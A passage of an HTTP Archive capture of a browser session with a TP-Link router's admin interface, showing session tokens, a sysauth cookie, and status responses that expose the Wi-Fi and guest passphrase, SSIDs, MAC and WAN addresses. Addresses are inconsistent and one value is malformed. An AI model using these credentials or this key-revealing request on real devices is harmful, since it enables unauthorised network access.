auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4755\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 266,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 637,\r\n \"receive\": 29\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:09.653+03:00\",\r\n \"time\": 1840,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 260,\r\n \"dns\": 251,\r\n \"connect\": 528,\r\n \"send\": 0,\r\n \"wait\": 796,\r\n \"receive\": 5\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:19.646+03:00\",\r\n \"time\": 979,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.07,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 274,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 681,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:19.654+03:00\",\r\n \"time\": 1814,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 266,\r\n \"dns\": 251,\r\n \"connect\": 532,\r\n \"send\": 0,\r\n \"wait\": 761,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:29.645+03:00\",\r\n \"time\": 952,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.08,\\\"wan_ipv4_ipaddr\\\":\\\"187.60.220.34\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":